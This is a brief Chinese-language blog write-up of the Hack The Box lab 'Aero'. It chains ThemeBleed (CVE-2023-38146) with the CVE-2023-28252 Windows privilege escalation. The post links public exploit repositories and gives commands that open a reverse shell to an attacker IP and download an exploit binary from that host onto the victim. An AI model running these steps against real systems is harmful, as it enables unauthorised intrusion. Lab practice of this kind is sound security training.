HTB-M-Aero
HTB-M-Aero
CVE-2023-28252+win11主题漏洞
显示win11的
如果是用Windows打的话
https://github.com/exploits-forsale/themebleed/releases/tag/v1
这还有Linux版本
https://github.com/Jnnshschl/CVE-2023-38146/tree/main
这个是themebleed.exe的python版本
1 | python themebleed.py -r 10.10.16.14 -p 4444 |
获得第一个shell
1 | tree /f . |
CVE-2023-28252
https://github.com/duck-sec/CVE-2023-28252-Compiled-exe
msf生成个反弹shell —-rev.exe
1 | wget http://10.10.16.14/CVE-2023-28252-Compiled-exe/exploit.exe -Outfile C:\Users\sam.emerson\Downloads\exploit.exe |
参考
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Comments